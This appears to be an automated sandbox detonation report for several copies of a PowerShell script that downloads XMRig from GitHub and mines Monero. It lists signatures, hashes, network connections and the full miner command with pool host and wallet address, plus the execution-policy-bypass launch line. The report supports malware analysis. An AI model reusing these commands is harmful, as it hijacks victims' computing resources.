N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/748-0-0x00007FFB70013000-0x00007FFB70015000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3mpd1vbh.xiz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/748-9-0x000001E4FE5B0000-0x000001E4FE5D2000-memory.dmp

memory/748-10-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/748-11-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/748-12-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/748-14-0x000001E4FE5E0000-0x000001E4FE5F2000-memory.dmp

memory/748-15-0x000001E4FE590000-0x000001E4FE59A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2952-46-0x000001EF16680000-0x000001EF166A0000-memory.dmp

memory/2952-47-0x000001EF166C0000-0x000001EF166E0000-memory.dmp

memory/2952-48-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/748-49-0x00007FFB70013000-0x00007FFB70015000-memory.dmp

memory/2952-52-0x000001EF16700000-0x000001EF16720000-memory.dmp

memory/2952-51-0x000001EF166E0000-0x000001EF16700000-memory.dmp

memory/748-50-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/2952-53-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/748-54-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/2952-55-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-56-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-58-0x000001EF16700000-0x000001EF16720000-memory.dmp

memory/2952-57-0x000001EF166E0000-0x000001EF16700000-memory.dmp

memory/2952-59-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-60-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-61-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-62-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-63-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-64-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-65-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-66-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-67-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-68-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-69-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-70-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-71-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-72-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-73-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-74-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-75-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-76-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-77-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-78-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-79-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-80-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-81-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-82-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-83-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-84-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-85-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-86-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-87-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-88-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-89-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-90-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-91-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-92-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-93-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-94-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-95-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-96-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-97-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-98-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-99-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-100-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-101-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-102-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-103-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-104-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-105-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-106-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-107-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-108-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-109-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-110-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-111-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-112-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-113-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-114-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-115-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-116-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-117-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10-20240611-en

Max time kernel

1793s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/2180-3-0x00007FF8C0603000-0x00007FF8C0604000-memory.dmp

memory/2180-5-0x000001F4FA460000-0x000001F4FA482000-memory.dmp

memory/2180-8-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

memory/2180-10-0x000001F4FA590000-0x000001F4FA606000-memory.dmp

memory/2180-9-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nvxu1ghy.b15.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2180-25-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

memory/2180-29-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

memory/2180-30-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

memory/2180-50-0x000001F4FA370000-0x000001F4FA382000-memory.dmp

memory/2180-63-0x000001F4FA360000-0x000001F4FA36A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2660-92-0x000001D71F0E0000-0x000001D71F100000-memory.dmp

memory/2660-93-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-94-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-95-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-96-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-97-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-98-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-99-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-100-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-101-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-102-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-103-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-104-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-105-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-106-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-107-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-108-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-109-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-110-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-111-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-112-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-113-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-114-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-115-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-116-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-117-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-118-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-119-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-120-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-121-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-122-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-123-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-124-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-125-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-126-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-127-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-128-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-129-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-130-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-131-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-132-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-133-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-134-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-135-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-136-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-137-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-138-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-139-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-140-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-141-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-142-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-143-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-144-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-145-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-146-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-147-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-148-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-149-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-150-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-151-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-152-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-153-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-154-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-155-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:24

Platform

win10v2004-20240508-en

Max time kernel

1798s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3960,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 45.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emgpv20u.5wu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:25

Platform

win7-20240221-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win7-20240220-en

Max time kernel

1562s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

N/A

Files

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:00

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

